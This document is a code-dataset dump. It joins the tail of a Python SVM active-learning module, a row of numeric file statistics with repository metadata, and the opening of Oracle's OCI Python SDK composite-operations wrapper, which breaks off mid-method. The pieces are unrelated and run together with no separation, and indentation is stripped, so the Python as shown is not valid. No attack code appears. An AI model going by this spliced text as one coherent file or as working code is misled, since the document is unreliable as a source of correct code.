Y = vstack((Y, array([oracle(ids[min_index])]).reshape((1,1))))
used.add(ids[min_index])
# Run SVM on all the labeled data
svm.batch_train(X, Y)
# Use the most recent separator found by SVM
self.support = svm.support
class PassiveSVMDual(KernelLearner, ActiveBatchLearner):
def __init__(self, d, C, kernel):
KernelLearner.__init__(self, d, kernel)
self.C = C
def active_batch_train(self, U, ids, oracle, label_budget):
m = min(len(U), label_budget)
# Query the labels of m examples
Y = array([oracle(ids[i]) for i in range(m)]).reshape((m, 1))
# Run standard SVM on the labeled data
svm = StochasticDualCoordinateAscent(self.d, self.C, self.kernel)
svm.train(U[:m], Y)
# Use the separator found by SVM
self.support = svm.support
class SVMSGD(LinearLearner, ActiveBatchLearner):
def __init__(self, d, C):
LinearLearner.__init__(self, d)
self.C = C
def active_batch_train(self, U, ids, oracle, label_budget):
m = min(len(U), label_budget)
# Query the labels of m examples
Y = array([oracle(ids[i]) for i in range(m)]).reshape((m, 1))
# Run standard SVM on the labeled data
svm = HingeLossSGD(self.d, self.C)
svm.batch_train(U[:m], Y)
# Use the separator found by SVM
self.w = svm.w
| 29.585366 | 187 | 0.631426 | 8,317 | 60,650 | 4.46435 | 0.062402 | 0.032588 | 0.035632 | 0.022515 | 0.797037 | 0.783167 | 0.767897 | 0.749367 | 0.728198 | 0.717614 | 0 | 0.012278 | 0.246661 | 60,650 | 2,049 | 188 | 29.599805 | 0.800372 | 0.160956 | 0 | 0.805415 | 0 | 0 | 0.007643 | 0 | 0 | 0 | 0 | 0.000488 | 0.001692 | 0 | null | null | 0.003384 | 0.009306 | null | null | 0.023689 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fafdebc770662bfe09478e5fc92bd9c7c264b77b | 530,289 | py | Python | src/oci/database/database_client_composite_operations.py | ezequielramos/oci-python-sdk | cc4235cf217beaf9feed75760e9ce82610222762 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | src/oci/database/database_client_composite_operations.py | ezequielramos/oci-python-sdk | cc4235cf217beaf9feed75760e9ce82610222762 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | src/oci/database/database_client_composite_operations.py | ezequielramos/oci-python-sdk | cc4235cf217beaf9feed75760e9ce82610222762 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | # coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
import oci # noqa: F401
from oci.util import WAIT_RESOURCE_NOT_FOUND # noqa: F401
class DatabaseClientCompositeOperations(object):
"""
This class provides a wrapper around :py:class:`~oci.database.DatabaseClient` and offers convenience methods
for operations that would otherwise need to be chained together. For example, instead of performing an action
on a resource (e.g. launching an instance, creating a load balancer) and then using a waiter to wait for the resource
to enter a given state, you can call a single method in this class to accomplish the same functionality
"""
def __init__(self, client, work_request_client=None, **kwargs):
"""
Creates a new DatabaseClientCompositeOperations object
:param DatabaseClient client:
The service client which will be wrapped by this object
:param oci.work_requests.WorkRequestClient work_request_client: (optional)
The work request service client which will be used to wait for work request states. Default is None.
"""
self.client = client
self._work_request_client = work_request_client if work_request_client else oci.work_requests.WorkRequestClient(self.client._config, **self.client._kwargs)
def activate_exadata_infrastructure_and_wait_for_work_request(self, exadata_infrastructure_id, activate_exadata_infrastructure_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.activate_exadata_infrastructure` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str exadata_infrastructure_id: (required)
The Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.ActivateExadataInfrastructureDetails activate_exadata_infrastructure_details: (required)
The activation details for the Exadata infrastructure and the additional storage servers requested.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.activate_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.activate_exadata_infrastructure(exadata_infrastructure_id, activate_exadata_infrastructure_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def activate_exadata_infrastructure_and_wait_for_state(self, exadata_infrastructure_id, activate_exadata_infrastructure_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.activate_exadata_infrastructure` and waits for the :py:class:`~oci.database.models.ExadataInfrastructure` acted upon
to enter the given state(s).
:param str exadata_infrastructure_id: (required)
The Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.ActivateExadataInfrastructureDetails activate_exadata_infrastructure_details: (required)
The activation details for the Exadata infrastructure and the additional storage servers requested.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ExadataInfrastructure.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.activate_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.activate_exadata_infrastructure(exadata_infrastructure_id, activate_exadata_infrastructure_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_exadata_infrastructure(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def add_storage_capacity_exadata_infrastructure_and_wait_for_work_request(self, exadata_infrastructure_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.add_storage_capacity_exadata_infrastructure` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str exadata_infrastructure_id: (required)
The Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.add_storage_capacity_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.add_storage_capacity_exadata_infrastructure(exadata_infrastructure_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def add_storage_capacity_exadata_infrastructure_and_wait_for_state(self, exadata_infrastructure_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.add_storage_capacity_exadata_infrastructure` and waits for the :py:class:`~oci.database.models.ExadataInfrastructure` acted upon
to enter the given state(s).
:param str exadata_infrastructure_id: (required)
The Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ExadataInfrastructure.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.add_storage_capacity_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.add_storage_capacity_exadata_infrastructure(exadata_infrastructure_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_exadata_infrastructure(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def add_virtual_machine_to_vm_cluster_and_wait_for_work_request(self, add_virtual_machine_to_vm_cluster_details, vm_cluster_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.add_virtual_machine_to_vm_cluster` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.AddVirtualMachineToVmClusterDetails add_virtual_machine_to_vm_cluster_details: (required)
Request to add Virtual Machines to the VM cluster.
:param str vm_cluster_id: (required)
The VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.add_virtual_machine_to_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.add_virtual_machine_to_vm_cluster(add_virtual_machine_to_vm_cluster_details, vm_cluster_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def add_virtual_machine_to_vm_cluster_and_wait_for_state(self, add_virtual_machine_to_vm_cluster_details, vm_cluster_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.add_virtual_machine_to_vm_cluster` and waits for the :py:class:`~oci.database.models.VmCluster` acted upon
to enter the given state(s).
:param oci.database.models.AddVirtualMachineToVmClusterDetails add_virtual_machine_to_vm_cluster_details: (required)
Request to add Virtual Machines to the VM cluster.
:param str vm_cluster_id: (required)
The VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.VmCluster.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.add_virtual_machine_to_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.add_virtual_machine_to_vm_cluster(add_virtual_machine_to_vm_cluster_details, vm_cluster_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_vm_cluster(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def autonomous_database_manual_refresh_and_wait_for_work_request(self, autonomous_database_id, autonomous_database_manual_refresh_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.autonomous_database_manual_refresh` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.AutonomousDatabaseManualRefreshDetails autonomous_database_manual_refresh_details: (required)
Request details for manually refreshing an Autonomous Database refreshable clone.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.autonomous_database_manual_refresh`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.autonomous_database_manual_refresh(autonomous_database_id, autonomous_database_manual_refresh_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def autonomous_database_manual_refresh_and_wait_for_state(self, autonomous_database_id, autonomous_database_manual_refresh_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.autonomous_database_manual_refresh` and waits for the :py:class:`~oci.database.models.AutonomousDatabase` acted upon
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.AutonomousDatabaseManualRefreshDetails autonomous_database_manual_refresh_details: (required)
Request details for manually refreshing an Autonomous Database refreshable clone.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.autonomous_database_manual_refresh`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.autonomous_database_manual_refresh(autonomous_database_id, autonomous_database_manual_refresh_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_autonomous_container_database_compartment_and_wait_for_work_request(self, change_compartment_details, autonomous_container_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_autonomous_container_database_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeCompartmentDetails change_compartment_details: (required)
Request to move Autonomous Container Database to a different compartment
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_autonomous_container_database_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_autonomous_container_database_compartment(change_compartment_details, autonomous_container_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_autonomous_database_compartment_and_wait_for_work_request(self, change_compartment_details, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_autonomous_database_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeCompartmentDetails change_compartment_details: (required)
Request to move Autonomous Database to a different compartment
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_autonomous_database_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_autonomous_database_compartment(change_compartment_details, autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_autonomous_exadata_infrastructure_compartment_and_wait_for_work_request(self, change_compartment_details, autonomous_exadata_infrastructure_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_autonomous_exadata_infrastructure_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeCompartmentDetails change_compartment_details: (required)
Request to move an Autonomous Exadata Infrastructure resource to a different compartment.
:param str autonomous_exadata_infrastructure_id: (required)
The Autonomous Exadata Infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_autonomous_exadata_infrastructure_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_autonomous_exadata_infrastructure_compartment(change_compartment_details, autonomous_exadata_infrastructure_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_autonomous_vm_cluster_compartment_and_wait_for_work_request(self, change_autonomous_vm_cluster_compartment_details, autonomous_vm_cluster_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_autonomous_vm_cluster_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeAutonomousVmClusterCompartmentDetails change_autonomous_vm_cluster_compartment_details: (required)
Request to move Autonomous VM cluster to a different compartment
:param str autonomous_vm_cluster_id: (required)
The autonomous VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_autonomous_vm_cluster_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_autonomous_vm_cluster_compartment(change_autonomous_vm_cluster_compartment_details, autonomous_vm_cluster_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_backup_destination_compartment_and_wait_for_work_request(self, change_compartment_details, backup_destination_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_backup_destination_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeCompartmentDetails change_compartment_details: (required)
Request to move backup destination to a different compartment.
:param str backup_destination_id: (required)
The `OCID`__ of the backup destination.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_backup_destination_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_backup_destination_compartment(change_compartment_details, backup_destination_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_cloud_exadata_infrastructure_compartment_and_wait_for_work_request(self, change_cloud_exadata_infrastructure_compartment_details, cloud_exadata_infrastructure_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_cloud_exadata_infrastructure_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeCloudExadataInfrastructureCompartmentDetails change_cloud_exadata_infrastructure_compartment_details: (required)
Request to move cloud Exadata infrastructure resource to a different compartment.
:param str cloud_exadata_infrastructure_id: (required)
The cloud Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_cloud_exadata_infrastructure_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_cloud_exadata_infrastructure_compartment(change_cloud_exadata_infrastructure_compartment_details, cloud_exadata_infrastructure_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_cloud_vm_cluster_compartment_and_wait_for_work_request(self, change_cloud_vm_cluster_compartment_details, cloud_vm_cluster_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_cloud_vm_cluster_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeCloudVmClusterCompartmentDetails change_cloud_vm_cluster_compartment_details: (required)
Request to move cloud VM cluster to a different compartment
:param str cloud_vm_cluster_id: (required)
The cloud VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_cloud_vm_cluster_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_cloud_vm_cluster_compartment(change_cloud_vm_cluster_compartment_details, cloud_vm_cluster_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
